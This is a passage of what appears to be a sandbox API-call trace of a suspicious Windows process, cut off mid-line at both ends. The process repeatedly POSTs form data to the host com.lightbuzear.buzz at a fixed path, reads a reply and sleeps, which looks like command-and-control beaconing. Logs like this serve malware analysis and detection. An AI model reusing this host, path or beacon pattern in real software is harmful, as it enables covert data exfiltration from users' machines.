lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0189.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0189.924] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0189.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0189.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814cf8 | out: hHeap=0x4780000) returned 1 [0189.925] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0189.925] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0189.925] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0189.925] FreeLibrary (hLibModule=0x71570000) returned 1 [0189.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0189.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0189.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e88 | out: hHeap=0x4780000) returned 1 [0189.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0189.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0189.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0189.927] Sleep (dwMilliseconds=0x2710) [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f910 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa78 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f910 | out: hHeap=0x4780000) returned 1 [0190.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0190.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0190.128] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f9b8 [0190.128] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151d0 [0190.128] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151d0 | out: hHeap=0x4780000) returned 1 [0190.128] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0190.128] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814fa0 [0190.128] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa60 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa60 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814ff0 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0190.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815108 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0190.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ff0 [0190.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0190.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0190.130] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0190.130] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0190.130] FreeLibrary (hLibModule=0x71780000) returned 1 [0190.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0190.131] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0190.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815180 [0190.131] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f880 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa78 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f880 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f880 [0190.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ff0 [0190.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ff0 [0190.133] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815018 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f898 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa00 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f898 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0190.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa00 | out: hHeap=0x4780000) returned 1 [0190.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481faa8 [0190.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0190.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0190.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0190.134] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0190.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0190.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0190.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0190.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0190.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0190.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0190.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0190.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f898 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f898 | out: hHeap=0x4780000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815130 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815130 | out: hHeap=0x4780000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815068 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0190.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0190.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0190.423] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0190.424] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0190.424] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0190.424] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0190.424] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0190.424] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0190.424] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0190.424] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0190.424] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0190.424] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0190.424] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0190.424] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0190.424] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0190.424] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f820 [0190.424] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f940 [0190.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0190.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48151a8 [0190.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0190.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151a8 | out: hHeap=0x4780000) returned 1 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48150b8 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0190.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48150e0 [0190.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0190.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0190.426] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0190.426] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0191.508] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0191.508] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0191.508] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0191.509] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f820 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814f50 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0191.509] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814f50 | out: hHeap=0x4780000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814de8 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0191.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814eb0 [0191.510] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0191.510] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0191.511] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0191.511] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0191.512] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814eb0 | out: hHeap=0x4780000) returned 1 [0191.512] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0191.512] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0191.512] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f988 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa60 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f988 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa60 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48150e0 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0191.513] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814f78 [0191.513] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0191.514] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48150e0 [0191.514] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0191.515] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0191.515] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0191.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0191.515] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0191.516] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0191.516] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0191.516] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0191.516] FreeLibrary (hLibModule=0x71570000) returned 1 [0191.516] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0191.516] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0191.517] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815018 | out: hHeap=0x4780000) returned 1 [0191.517] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0191.517] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815180 | out: hHeap=0x4780000) returned 1 [0191.518] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814fa0 | out: hHeap=0x4780000) returned 1 [0191.518] Sleep (dwMilliseconds=0x2710) [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0191.697] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0191.697] RtlAllocateHeap (HeapHandle=0x4780000, 